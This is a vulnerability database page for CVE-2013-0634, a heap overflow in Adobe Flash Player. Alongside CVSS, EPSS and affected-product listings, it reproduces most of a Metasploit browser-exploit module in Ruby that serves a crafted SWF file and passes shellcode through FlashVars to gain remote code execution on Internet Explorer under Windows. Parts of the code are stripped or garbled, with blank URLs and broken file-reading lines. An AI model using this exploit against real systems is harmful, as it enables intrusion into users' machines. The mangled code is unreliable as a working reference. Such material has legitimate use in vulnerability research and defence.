Related Weaknesses
Weakness Name |
Source |
CWE-119 |
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data. |
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
9.3 |
AV:N/AC:M/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 32959
Publication date : 2014-04-20 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
# This module requires Metasploit: http//
# Current source:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
'Name' => "Adobe Flash Player Regular Expression Heap Overflow",
'Description' => %q{
This module exploits a vulnerability found in the ActiveX component of Adobe
Flash Player before 11.5.502.149. By supplying a specially crafted swf file
with special regex value, it is possible to trigger an memory corruption, which
results in remote code execution under the context of the user, as exploited in
the wild in February 2013. This module has been tested successfully with Adobe
Flash Player 11.5 before 11.5.502.149 on Windows XP SP3 and Windows 7 SP1 before
MS13-063, since it takes advantage of a predictable SharedUserData in order to
leak ntdll and bypass ASLR.
'License' => MSF_LICENSE,
'Author' =>
'Unknown', # malware sample
'Boris "dukeBarman" Ryutin', # msf exploit
'juan vazquez' # ActionScript deobfuscation and cleaning
'References' =>
[ 'CVE', '2013-0634' ],
[ 'OSVDB', '89936'],
[ 'BID', '57787'],
[ 'URL', '' ],
[ 'URL', '' ],
[ 'URL', '' ],
[ 'URL', '' ],
[ 'URL', '' ]
'Payload' =>
'Space' => 1024,
'DisableNops' => true
'DefaultOptions' =>
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false
'Platform' => 'win',
'BrowserRequirements' =>
:source => /script|headers/i,
:clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
:method => "LoadMovie",
:os_name => Msf::OperatingSystems::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
'Targets' =>
[ 'Automatic', {} ]
'Privileged' => false,
'DisclosureDate' => "Feb 8 2013",
'DefaultTarget' => 0))
def exploit
@swf = create_swf
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
shellcode = get_payload(cli, target_info).unpack("H*")[0]
html_template = %Q|<html>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="his=<%=shellcode%>" />
<param name="Play" value="true" />
return html_template, binding()
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-0634", "exploit.swf" )
swf =, 'rb') { |f| swf = }
Products Mentioned
Configuraton 0
Adobe>>Flash_player >> Version From (including) 10.3 To (excluding)
Adobe>>Flash_player >> Version From (including) 11.5 To (excluding) 11.5.502.149
Apple>>Mac_os_x >> Version -
Microsoft>>Windows >> Version -
Configuraton 0
Adobe>>Flash_player >> Version From (including) 10.3 To (excluding)
Adobe>>Flash_player >> Version From (including) 11.2 To (excluding)
Linux>>Linux_kernel >> Version -
Configuraton 0
Adobe>>Flash_player >> Version From (including) 11.1 To (excluding)
Google>>Android >> Version From (including) 2.0 To (including) 2.3.7
Google>>Android >> Version From (including) 3.0 To (including) 3.2.6
Configuraton 0
Adobe>>Flash_player >> Version From (including) 11.1 To (excluding)
Google>>Android >> Version From (including) 4.0 To (including) 4.4.4